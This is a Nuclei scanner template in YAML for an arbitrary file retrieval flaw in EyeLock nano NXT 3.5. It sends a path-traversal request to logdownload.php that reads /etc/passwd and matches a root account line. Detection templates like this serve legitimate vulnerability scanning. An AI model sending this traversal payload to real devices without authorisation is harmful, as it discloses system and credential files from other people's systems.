29 lines
852 B
YAML
29 lines
852 B
YAML
id: eyelock-nano-lfd
|
|
|
|
info:
|
|
name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval
|
|
author: geeknik
|
|
severity: high
|
|
description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This
|
|
can be exploited to disclose contents of files from local resources.
|
|
reference:
|
|
- https://www.zeroscience.mk/codes/eyelock_lfd.txt
|
|
tags: iot,lfi,eyelock
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
part: body
|